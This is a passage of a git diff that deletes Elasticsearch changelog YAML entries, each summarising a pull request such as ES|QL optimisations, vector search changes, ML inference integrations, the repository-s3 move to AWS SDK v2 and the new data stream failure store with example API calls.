cluster applier thread when shards are - removed from a node. These can be expensive if a large number of shards are - being removed. This change uses the context of the removal to avoid unnecessary - evictions that might hold up the applier thread. - " -area: Snapshot/Restore -type: enhancement -issues: [] diff --git a/docs/changelog/126594.yaml b/docs/changelog/126594.yaml deleted file mode 100644 index 59743a606d34a..0000000000000 --- a/docs/changelog/126594.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126594 -summary: Upgrade to Lucene 10.2.0 -area: Search -type: upgrade -issues: [] diff --git a/docs/changelog/126598.yaml b/docs/changelog/126598.yaml deleted file mode 100644 index 39187f0d60977..0000000000000 --- a/docs/changelog/126598.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126598 -summary: "ESQL: Retain aggregate when grouping" -area: ES|QL -type: bug -issues: - - 126026 diff --git a/docs/changelog/126612.yaml b/docs/changelog/126612.yaml deleted file mode 100644 index e8fd1825bfc2d..0000000000000 --- a/docs/changelog/126612.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126612 -summary: Add Support for Providing a custom `ServiceAccountTokenStore` through `SecurityExtensions` -area: Authentication -type: enhancement -issues: [] diff --git a/docs/changelog/126629.yaml b/docs/changelog/126629.yaml deleted file mode 100644 index 49d04856c0b64..0000000000000 --- a/docs/changelog/126629.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126629 -summary: Default new `semantic_text` fields to use BBQ when models are compatible -area: Relevance -type: enhancement -issues: [] diff --git a/docs/changelog/126641.yaml b/docs/changelog/126641.yaml deleted file mode 100644 index d99977d981acd..0000000000000 --- a/docs/changelog/126641.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126641 -summary: Push more `==`s on text fields to lucene -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/126644.yaml b/docs/changelog/126644.yaml deleted file mode 100644 index 05b1cbccbae1b..0000000000000 --- a/docs/changelog/126644.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126644 -summary: Add block loader from stored field and source for ip field -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/126653.yaml b/docs/changelog/126653.yaml deleted file mode 100644 index 1497aa7a40053..0000000000000 --- a/docs/changelog/126653.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126653 -summary: Retry shard movements during ESQL query -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/126687.yaml b/docs/changelog/126687.yaml deleted file mode 100644 index d140b67e36a49..0000000000000 --- a/docs/changelog/126687.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126687 -summary: Permit at+jwt typ header value in jwt access tokens -area: Authentication -type: enhancement -issues: - - 119370 diff --git a/docs/changelog/126702.yaml b/docs/changelog/126702.yaml deleted file mode 100644 index a6def67c08c6d..0000000000000 --- a/docs/changelog/126702.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126702 -summary: "Return float[] instead of List in `valueFetcher`" -area: Search -type: enhancement -issues: [] diff --git a/docs/changelog/126704.yaml b/docs/changelog/126704.yaml deleted file mode 100644 index 7f86594a05160..0000000000000 --- a/docs/changelog/126704.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126704 -summary: Add dense vector off-heap stats to Node stats and Index stats APIs -area: "Vector Search" -type: enhancement -issues: [] diff --git a/docs/changelog/126724.yaml b/docs/changelog/126724.yaml deleted file mode 100644 index 8c41d04ff7ae5..0000000000000 --- a/docs/changelog/126724.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126724 -summary: Fix painless return type cast for list shortcut -area: Infra/Scripting -type: bug -issues: [] diff --git a/docs/changelog/126751.yaml b/docs/changelog/126751.yaml deleted file mode 100644 index 05235c922d754..0000000000000 --- a/docs/changelog/126751.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126751 -summary: Allow float settings to be configured with other settings as default -area: Infra/Settings -type: enhancement -issues: [] diff --git a/docs/changelog/126770.yaml b/docs/changelog/126770.yaml deleted file mode 100644 index cc4bc2d1d842f..0000000000000 --- a/docs/changelog/126770.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126770 -summary: Remove empty results before merging -area: Search -type: bug -issues: - - 126742 diff --git a/docs/changelog/126786.yaml b/docs/changelog/126786.yaml deleted file mode 100644 index 0f7243324ed82..0000000000000 --- a/docs/changelog/126786.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126786 -summary: Account for time taken to write index buffers in `IndexingMemoryController` -area: Distributed -type: enhancement -issues: [] diff --git a/docs/changelog/126792.yaml b/docs/changelog/126792.yaml deleted file mode 100644 index 66e46fa59c433..0000000000000 --- a/docs/changelog/126792.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126792 -summary: Revert endpoint creation validation for ELSER and E5 -area: Machine Learning -type: bug -issues: [] diff --git a/docs/changelog/126803.yaml b/docs/changelog/126803.yaml deleted file mode 100644 index a0b2c6a4742a4..0000000000000 --- a/docs/changelog/126803.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126803 -summary: "[Security Solution] Add `read` index privileges to `kibana_system` role\ - \ for Microsoft Defender integration indexes" -area: Authorization -type: enhancement -issues: [] diff --git a/docs/changelog/126805.yaml b/docs/changelog/126805.yaml deleted file mode 100644 index 9051f775f698d..0000000000000 --- a/docs/changelog/126805.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126805 -summary: Adding timeout to request for creating inference endpoint -area: Machine Learning -type: bug -issues: [] diff --git a/docs/changelog/126840.yaml b/docs/changelog/126840.yaml deleted file mode 100644 index 53c899a575def..0000000000000 --- a/docs/changelog/126840.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126840 -summary: Fix `PolicyStepsRegistry` cache concurrency issue -area: ILM+SLM -type: bug -issues: - - 118406 diff --git a/docs/changelog/126843.yaml b/docs/changelog/126843.yaml deleted file mode 100644 index 1497f75b2ea74..0000000000000 --- a/docs/changelog/126843.yaml +++ /dev/null @@ -1,89 +0,0 @@ -pr: 126843 -summary: Upgrade `repository-s3` to AWS SDK v2 -area: Snapshot/Restore -type: breaking -issues: - - 120993 -highlight: - title: Upgrade `repository-s3` to AWS SDK v2 - body: >- - In earlier versions of {es} the `repository-s3` plugin was based on the AWS - SDK v1. AWS will withdraw support for this SDK before the end of the life - of {es} {minor-version} so we have migrated this plugin to the newer AWS SDK v2. - - The two SDKs are not quite compatible, so please check the breaking changes - documentation and test the new version thoroughly before upgrading any - production workloads. - notable: true -breaking: - title: Upgrade `repository-s3` to AWS SDK v2 - area: Cluster and node setting - details: >- - In earlier versions of {es} the `repository-s3` plugin was based on the AWS - SDK v1. AWS will withdraw support for this SDK before the end of the life - of {es} {minor-version} so we must migrate to the newer AWS SDK v2. - - Unfortunately there are several differences between the two AWS SDK - versions which may require you to adjust your system configuration when - upgrading to {es} {minor-version} or later. These differences include, but - may not be limited to, the following items. - - * AWS SDK v2 requires users to specify the region to use for signing - requests, or else to run in an environment in which it can determine the - correct region automatically. The older SDK would try to determine the - region based on the endpoint URL as specified with the - `s3.client.${CLIENT_NAME}.endpoint` setting, together with other data - drawn from the operating environment, and would ultimately fall back to - `us-east-1` if no better value could be found. - - * AWS SDK v2 does not support the EC2 IMDSv1 protocol. - - * AWS SDK v2 does not support the - `com.amazonaws.sdk.ec2MetadataServiceEndpointOverride` system property. - - * AWS SDK v2 does not permit specifying a choice between HTTP and HTTPS so - the `s3.client.${CLIENT_NAME}.protocol` setting is deprecated. - - * AWS SDK v2 does not permit control over throttling for retries, so the - the `s3.client.${CLIENT_NAME}.use_throttle_retries` setting is deprecated - and no longer has any effect. - - * AWS SDK v2 requires the use of the V4 signature algorithm, so the - `s3.client.${CLIENT_NAME}.signer_override` setting is deprecated and no - longer has any effect. - - * AWS SDK v2 does not support the `log-delivery-write` canned ACL. - - * AWS SDK v2 counts 4xx responses differently in its metrics reporting. - - * AWS SDK v2 always uses the regional STS endpoint, whereas AWS SDK v2 - could use either a regional endpoint or the global - `https://sts.amazonaws.com` one. - - impact: >- - If you use the `repository-s3` module, test your upgrade thoroughly before - upgrading any production workloads. - - Adapt your configuration to the new SDK functionality. This includes, but - may not be limited to, the following items. - - * Specify the correct signing region using the - `s3.client.${CLIENT_NAME}.region` setting on each node. {es} will try and - determine the correct region based on the endpoint URL and other data - drawn from the operating environment but cannot guarantee to do so - correctly in all cases. - - * If you use IMDS to determine the availability zone of a node or to obtain - credentials for accessing the EC2 API, ensure that it supports the IMDSv2 - protocol. - - * If applicable, discontinue use of the - `com.amazonaws.sdk.ec2MetadataServiceEndpointOverride` system property. - - * If applicable, specify the protocol to use to access the S3 API by - setting `s3.client.${CLIENT_NAME}.endpoint` to a URL which starts with - `http://` or `https://`. - - * If applicable, discontinue use of the `log-delivery-write` canned ACL. - - notable: true diff --git a/docs/changelog/126856.yaml b/docs/changelog/126856.yaml deleted file mode 100644 index 5cc9bdc6946f6..0000000000000 --- a/docs/changelog/126856.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126856 -summary: "[ML] Integrate SageMaker with OpenAI Embeddings" -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/126866.yaml b/docs/changelog/126866.yaml deleted file mode 100644 index ff2e9d2ce03cb..0000000000000 --- a/docs/changelog/126866.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126866 -summary: Add recursive chunker -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/126876.yaml b/docs/changelog/126876.yaml deleted file mode 100644 index 895af10840d84..0000000000000 --- a/docs/changelog/126876.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126876 -summary: Improve HNSW filtered search speed through new heuristic -area: Vector Search -type: enhancement -issues: [] diff --git a/docs/changelog/126935.yaml b/docs/changelog/126935.yaml deleted file mode 100644 index 7ef231ffa83c4..0000000000000 --- a/docs/changelog/126935.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126935 -summary: Synonyms API - Add refresh parameter to check synonyms index and reload analyzers -area: Analysis -type: enhancement -issues: - - 121441 diff --git a/docs/changelog/126956.yaml b/docs/changelog/126956.yaml deleted file mode 100644 index c8766bcdb9e67..0000000000000 --- a/docs/changelog/126956.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126956 -summary: Temporarily bypass competitive iteration for filters aggregation -area: Aggregations -type: bug -issues: [] diff --git a/docs/changelog/126973.yaml b/docs/changelog/126973.yaml deleted file mode 100644 index 9cd279e0f56a5..0000000000000 --- a/docs/changelog/126973.yaml +++ /dev/null @@ -1,89 +0,0 @@ -pr: 126973 -summary: Add ability to redirect ingestion failures on data streams to a failure store -area: Data streams -type: feature -issues: [] -highlight: - title: Add ability to redirect ingestion failures on data streams to a failure store - body: |- - Documents that encountered ingest pipeline failures or mapping conflicts - would previously be returned to the client as errors in the bulk and - index operations. Many client applications are not equipped to respond - to these failures. This leads to the failed documents often being - dropped by the client which cannot hold the broken documents - indefinitely. In many end user workloads, these failed documents - represent events that could be critical signals for observability or - security use cases. - - To help mitigate this problem, data streams can now maintain a "failure - store" which is used to accept and hold documents that fail to be - ingested due to preventable configuration errors. The data stream's - failure store operates like a separate set of backing indices with their - own mappings and access patterns that allow Elasticsearch to accept - documents that would otherwise be rejected due to unhandled ingest - pipeline exceptions or mapping conflicts. - - Users can enable redirection of ingest failures to the failure store on - new data streams by specifying it in the new `data_stream_options` field - inside of a component or index template: - - [source,yaml] - ---- - PUT _index_template/my-template - { - "index_patterns": ["logs-test-*"], - "data_stream": {}, - "template": { - "data_stream_options": { - "failure_store": { - "enabled": true - } - } - } - }' - ---- - - Existing data streams can be configured with the new data stream - `_options` endpoint: - - [source,yaml] - ---- - PUT _data_stream/logs-test-apache/_options - { - "failure_store": { - "enabled": "true" - } - } - ---- - - When redirection is enabled, any ingestion related failures will be - captured in the failure store if the cluster is able to, along with the - timestamp that the failure occurred, details about the error - encountered, and the document that could not be ingested. Since failure - stores are a kind of Elasticsearch index, we can search the data stream - for the failures that it has collected. The failures are not shown by - default as they are stored in different indices than the normal data - stream data. In order to retrieve the failures, we use the `_search` API - along with a new bit of index pattern syntax, the `::` selector. - - [source,yaml] - ---- - POST logs-test-apache::failures/_search - ---- - - This index syntax informs the search operation to target the indices in - its failure store instead of its backing indices. It can be mixed in a - number of ways with other index patterns to include their failure store - indices in the search operation: - - [source,yaml] - ---- - POST logs-*::failures/_search - POST logs-*,logs-*::failures/_search - POST *::failures/_search - POST _query - { - "query": "FROM my_data_stream*::failures" - } - ---- - notable: true diff --git a/docs/changelog/127006.yaml b/docs/changelog/127006.yaml deleted file mode 100644 index fa41bce2791f6..0000000000000 --- a/docs/changelog/127006.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127006 -summary: Correctly handle non-integers in nested paths in the remove processor -area: Ingest Node -type: bug -issues: [] diff --git a/docs/changelog/127118.yaml b/docs/changelog/127118.yaml deleted file mode 100644 index cf3bd807d4a2d..0000000000000 --- a/docs/changelog/127118.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127118 -summary: Panama vector accelerated optimized scalar quantization -area: Vector Search -type: enhancement -issues: [] diff --git a/docs/changelog/127134.yaml b/docs/changelog/127134.yaml deleted file mode 100644 index 97d6de2f99878..0000000000000 --- a/docs/changelog/127134.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127134 -summary: Define a default oversample value for dense vectors with bbq_hnsw/bbq_flat -area: Vector Search -type: enhancement -issues: [] diff --git a/docs/changelog/127139.yaml b/docs/changelog/127139.yaml deleted file mode 100644 index 29190073fb152..0000000000000 --- a/docs/changelog/127139.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127139 -summary: Add `suggested_cast` -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/127148.yaml b/docs/changelog/127148.yaml deleted file mode 100644 index db98b21a944b2..0000000000000 --- a/docs/changelog/127148.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127148 -summary: Skip unused STATS groups by adding a Top N `BlockHash` implementation -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/127199.yaml b/docs/changelog/127199.yaml deleted file mode 100644 index e6b3710f7e97c..0000000000000 --- a/docs/changelog/127199.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 127199 -summary: Disable a bugged commit -area: ES|QL -type: bug -issues: - - 127197 diff --git a/docs/changelog/127201.yaml b/docs/changelog/127201.yaml deleted file mode 100644 index 5a205c65785b0..0000000000000 --- a/docs/changelog/127201.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127201 -summary: Emit ordinal output block for values aggregate -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/127229.yaml b/docs/changelog/127229.yaml deleted file mode 100644 index fe551c95c6d01..0000000000000 --- a/docs/changelog/127229.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 127229 -summary: Return BAD_REQUEST when a field scorer references a missing field -area: Ranking -type: bug -issues: - - 127162 diff --git a/docs/changelog/127250.yaml b/docs/changelog/127250.yaml deleted file mode 100644 index 44a41645bd6c3..0000000000000 --- a/docs/changelog/127250.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 127250 -summary: Do not apply further shard snapshot status updates after shard snapshot is - complete -area: Snapshot/Restore -type: bug -issues: [] diff --git a/docs/changelog/127254.yaml b/docs/changelog/127254.yaml deleted file mode 100644 index 366b1a2cce00b..0000000000000 --- a/docs/changelog/127254.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127254 -summary: "[ML] Add HuggingFace Chat Completion support to the Inference Plugin" -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/127267.yaml b/docs/changelog/127267.yaml deleted file mode 100644 index 3ec9828cabe84..0000000000000 --- a/docs/changelog/127267.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127267 -summary: Bypass competitive iteration in single filter bucket case -area: "Aggregations" -type: bug -issues: [127262] diff --git a/docs/changelog/127285.yaml b/docs/changelog/127285.yaml deleted file mode 100644 index e735580b5f310..0000000000000 --- a/docs/changelog/127285.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127285 -summary: Restore model registry validation for the semantic text field -area: Search -type: enhancement -issues: [] diff --git a/docs/changelog/127299.yaml b/docs/changelog/127299.yaml deleted file mode 100644 index d83551fbbe1aa..0000000000000 --- a/docs/changelog/127299.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127299 -summary: Introduce `AggregateMetricDoubleBlock` -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/127314.yaml b/docs/changelog/127314.yaml deleted file mode 100644 index 412fa2e78ffaf..0000000000000 --- a/docs/changelog/127314.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127314 -summary: "[Failure store] Introduce dedicated failure store lifecycle configuration" -area: Data streams -type: enhancement -issues: [] diff --git a/docs/changelog/127321.yaml b/docs/changelog/127321.yaml deleted file mode 100644 index 16191d9c34442..0000000000000 --- a/docs/changelog/127321.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 127321 -summary: Granting `kibana_system` reserved role access to "all" privileges to `.adhoc.alerts*` - and `.internal.adhoc.alerts*` indices -area: Authorization -type: enhancement -issues: [] diff --git a/docs/changelog/127330.yaml b/docs/changelog/127330.yaml deleted file mode 100644 index 059c8185c0060..0000000000000 --- a/docs/changelog/127330.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127330 -summary: Move unpromotable relocations to its own transport action -area: Recovery -type: enhancement -issues: [] diff --git a/docs/changelog/127343.yaml b/docs/changelog/127343.yaml deleted file mode 100644 index 3d3e12799d163..0000000000000 --- a/docs/changelog/127343.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127343 -summary: Upgrade to Lucene 10.2.1 -area: Search -type: upgrade -issues: [] diff --git a/docs/changelog/127348.yaml b/docs/changelog/127348.yaml deleted file mode 100644 index 933869b2a9d55..0000000000000 --- a/docs/changelog/127348.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127348 -summary: Speed loading stored fields -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/127351.yaml b/docs/changelog/127351.yaml deleted file mode 100644 index ca16c5695f004..0000000000000 --- a/docs/changelog/127351.yaml +++ /dev/null @@ -1,16 +0,0 @@ -pr: 127351 -summary: Allow partial results by default in ES|QL -area: ES|QL -type: breaking -issues: [122802] - -breaking: - title: Allow partial results by default in ES|QL - area: ES|QL - details: >- - In earlier versions of {es}, ES|QL would fail the entire query if it encountered any error. ES|QL now returns partial results instead of failing when encountering errors. - - impact: >- - Callers should check the `is_partial` flag returned in the response to determine if the result is partial or complete. If returning partial results is not desired, this option can be overridden per request via an `allow_partial_results` parameter in the query URL or globally via the cluster setting `esql.query.allow_partial_results`. - - notable: true diff --git a/docs/changelog/127355.yaml b/docs/changelog/127355.yaml deleted file mode 100644 index 28ead562ed8c5..0000000000000 --- a/docs/changelog/127355.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127355 -summary: '`text ==` and `text !=` pushdown' -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/127371.yaml b/docs/changelog/127371.yaml deleted file mode 100644 index 10f5f17243193..0000000000000 --- a/docs/changelog/127371.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 127371 -summary: Add cancellation support in `TransportGetAllocationStatsAction` -area: Allocation -type: feature -issues: - - 123248 diff --git a/docs/changelog/127472.yaml b/docs/changelog/127472.yaml deleted file mode 100644 index b91288f82bcdd..0000000000000 --- a/docs/changelog/127472.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 127472 -summary: Change queries ID to be the same as the async -area: ES|QL -type: feature -issues: - - 127187 diff --git a/docs/changelog/127522.yaml b/docs/changelog/127522.yaml deleted file mode 100644 index 344456ac4a31f..0000000000000 --- a/docs/changelog/127522.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 127522 -summary: Use INTERNAL_INGEST for Inference -area: Machine Learning -type: bug -issues: - - 127519 diff --git a/docs/changelog/127524.yaml b/docs/changelog/127524.yaml deleted file mode 100644 index d11599ddcde58..0000000000000 --- a/docs/changelog/127524.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 127524 -summary: Resolve groupings in aggregate before resolving references to groupings in - the aggregations -area: ES|QL -type: bug -issues: [] diff --git a/docs/changelog/127549.yaml b/docs/changelog/127549.yaml deleted file mode 100644 index 5f24111d22689..0000000000000 --- a/docs/changelog/127549.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127549 -summary: Add local optimizations for `constant_keyword` -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/127573.yaml b/docs/changelog/127573.yaml deleted file mode 100644 index b0bc1548c09f7..0000000000000 --- a/docs/changelog/127573.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127573 -summary: "[Failure store] Introduce default retention for failure indices" -area: Data streams -type: enhancement -issues: [] diff --git a/docs/changelog/127582.yaml b/docs/changelog/127582.yaml deleted file mode 100644 index 589c20e8f2fbc..0000000000000 --- a/docs/changelog/127582.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127582 -summary: Specialize ags `AddInput` for each block type -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/127583.yaml b/docs/changelog/127583.yaml deleted file mode 100644 index 6e315a2b827b9..0000000000000 --- a/docs/changelog/127583.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 127583 -summary: Add optimization to purge join on null merge key -area: ES|QL -type: enhancement -issues: - - 125577 diff --git a/docs/changelog/127628.yaml b/docs/changelog/127628.yaml deleted file mode 100644 index 083b425f13eb4..0000000000000 --- a/docs/changelog/127628.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127628 -summary: Ensure config reload on ..data symlink switch for CSI driver support -area: Infra/Settings -type: enhancement -issues: [] diff --git a/docs/changelog/127629.yaml b/docs/changelog/127629.yaml deleted file mode 100644 index 20ae5eebfb3a4..0000000000000 --- a/docs/changelog/127629.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127629 -summary: ES|QL SAMPLE aggregation function -area: Machine Learning -type: feature -issues: [] diff --git a/docs/changelog/127636.yaml b/docs/changelog/127636.yaml deleted file mode 100644 index e329eb4bce333..0000000000000 --- a/docs/changelog/127636.yaml +++ /dev/null @@ -1,17 +0,0 @@ -pr: 127636 -summary: Disallow mixed quoted/unquoted patterns in FROM -area: ES|QL -type: breaking -issues: - - 122651 -breaking: - title: Disallow mixed quoted/unquoted patterns in FROM - area: ES|QL - details: "Previously, the ES|QL grammar allowed users to individually quote constituent strings in index patterns\ - \ such as \"remote_cluster\":\"index_name\". This would allow users to write complex malformed index patterns\ - \ that often slip through grammar and the subsequent validation. This could result in runtime errors\ - \ that can be misleading. This change simplifies the grammar to early reject such malformed index patterns\ - \ at the parsing stage, allowing users to write simpler queries and see more relevant and meaningful\ - \ errors." - impact: "Users can write queries with simpler index patterns and see more meaningful and relevant errors." - notable: false diff --git a/docs/changelog/127661.yaml b/docs/changelog/127661.yaml deleted file mode 100644 index 66c8336963271..0000000000000 --- a/docs/changelog/127661.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127661 -summary: Add MATCH_PHRASE -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/127664.yaml b/docs/changelog/127664.yaml deleted file mode 100644 index 6290607b987f7..0000000000000 --- a/docs/changelog/127664.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127664 -summary: Exclude `semantic_text` subfields from field capabilities API -area: "Mapping" -type: enhancement -issues: [] diff --git a/docs/changelog/127668.yaml b/docs/changelog/127668.yaml deleted file mode 100644 index 04d219e543b12..0000000000000 --- a/docs/changelog/127668.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 127668 -summary: Fix transport versions -area: "ES|QL" -type: bug -issues: - - 127667 diff --git a/docs/changelog/127731.yaml b/docs/changelog/127731.yaml deleted file mode 100644 index 2641c96e2e05b..0000000000000 --- a/docs/changelog/127731.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127731 -summary: ESQL - Enable telemetry for COMPLETION command -area: Search -type: feature -issues: [] diff --git a/docs/changelog/127734.yaml b/docs/changelog/127734.yaml deleted file mode 100644 index d33b201744c46..0000000000000 --- a/docs/changelog/127734.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127734 -summary: Run coordinating `can_match` in field-caps -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/127767.yaml b/docs/changelog/127767.yaml deleted file mode 100644 index 659fc31fbaf83..0000000000000 --- a/docs/changelog/127767.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127767 -summary: Integrate `OpenAi` Chat Completion in `SageMaker` -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/127796.yaml b/docs/changelog/127796.yaml deleted file mode 100644 index c87e777f83d40..0000000000000 --- a/docs/changelog/127796.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 127796 -summary: Do not respect synthetic_source_keep=arrays if type parses arrays -area: Mapping -type: enhancement -issues: - - 126155 diff --git a/docs/changelog/127797.yaml b/docs/changelog/127797.yaml deleted file mode 100644 index 8fca3da004130..0000000000000 --- a/docs/changelog/127797.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 127797 -summary: "Date nanos implicit casting in union types option #2" -area: ES|QL -type: enhancement -issues: - - 110009 diff --git a/docs/changelog/127817.yaml b/docs/changelog/127817.yaml deleted file mode 100644 index 7c0f78b39a809..0000000000000 --- a/docs/changelog/127817.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127817 -summary: Replace auto-read with proper flow-control in HTTP pipeline -area: Network -type: enhancement -issues: [] diff --git a/docs/changelog/127849.yaml b/docs/changelog/127849.yaml deleted file mode 100644 index 4d5b747b35011..0000000000000 --- a/docs/changelog/127849.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127849 -summary: Optimize ordinal inputs in Values aggregation -area: "ES|QL" -type: enhancement -issues: [] diff --git a/docs/changelog/127910.yaml b/docs/changelog/127910.yaml deleted file mode 100644 index 3b3641cd17f0f..0000000000000 --- a/docs/changelog/127910.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127910 -summary: Add Microsoft Graph Delegated Authorization Realm Plugin -area: Authorization -type: enhancement -issues: [] diff --git a/docs/changelog/127939.yaml b/docs/changelog/127939.yaml deleted file mode 100644 index 7cc67e6207a85..0000000000000 --- a/docs/changelog/127939.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127939 -summary: Add Custom inference service -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/127966.yaml b/docs/changelog/127966.yaml deleted file mode 100644 index 0c896715149bf..0000000000000 --- a/docs/changelog/127966.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127966 -summary: "[ML] Add Rerank support to the Inference Plugin" -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/127968.yaml b/docs/changelog/127968.yaml deleted file mode 100644 index 5cc867d0d2637..0000000000000 --- a/docs/changelog/127968.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 127968 -summary: "Enable sort optimization on int, short and byte fields" -area: Search -type: enhancement -issues: - - 127965 diff --git a/docs/changelog/127988.yaml b/docs/changelog/127988.yaml deleted file mode 100644 index 5cb3540f90b08..0000000000000 --- a/docs/changelog/127988.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127988 -summary: Add emit time to hash aggregation status -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/128025.yaml b/docs/changelog/128025.yaml deleted file mode 100644 index 61a9a80fabfb1..0000000000000 --- a/docs/changelog/128025.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 128025 -summary: "Set `connection: close` header on shutdown" -area: Network -type: enhancement -issues: - - 127984 diff --git a/docs/changelog/128063.yaml b/docs/changelog/128063.yaml deleted file mode 100644 index 281d80d1c6ec0..0000000000000 --- a/docs/changelog/128063.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128063 -summary: More efficient sort in `tryRelocateShard` -area: Allocation -type: enhancement -issues: [] diff --git a/docs/changelog/128099.yaml b/docs/changelog/128099.yaml deleted file mode 100644 index 1f26cb00bd75d..0000000000000 --- a/docs/changelog/128099.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128099 -summary: Remove first `FlowControlHandler` from HTTP pipeline -area: Network -type: enhancement -issues: [] diff --git a/docs/changelog/128105.yaml b/docs/changelog/128105.yaml deleted file mode 100644 index 2dd6b55f54d24..0000000000000 --- a/docs/changelog/128105.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128105 -summary: "Adding Google VertexAI chat completion integration" -area: Inference -type: enhancement -issues: [ ] diff --git a/docs/changelog/128139.yaml b/docs/changelog/128139.yaml deleted file mode 100644 index b21e2c744f4d9..0000000000000 --- a/docs/changelog/128139.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128139 -summary: Skip indexing points for `seq_no` in tsdb and logsdb -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/128163.yaml b/docs/changelog/128163.yaml deleted file mode 100644 index 6cebf3738017f..0000000000000 --- a/docs/changelog/128163.yaml +++ /dev/null @@ -1,17 +0,0 @@ -pr: 128163 -summary: Make `skip_unavailable` catch all errors -area: ES|QL -type: breaking -issues: [ ] -breaking: - title: Cluster setting "skip_unavailable" catches all runtime errors - area: ES|QL - details: "If `skip_unavailable` is set to `true`, the runtime errors from this cluster\ - \ do not lead to a failure of the query. Instead, the cluster is set to `skipped`\ - \ or `partial` status, and the query execution continues. This is a breaking change\ - \ from previous versions, where `skip_unavailable` only applied to errors related\ - \ to a cluster being unavailable." - impact: "The errors on 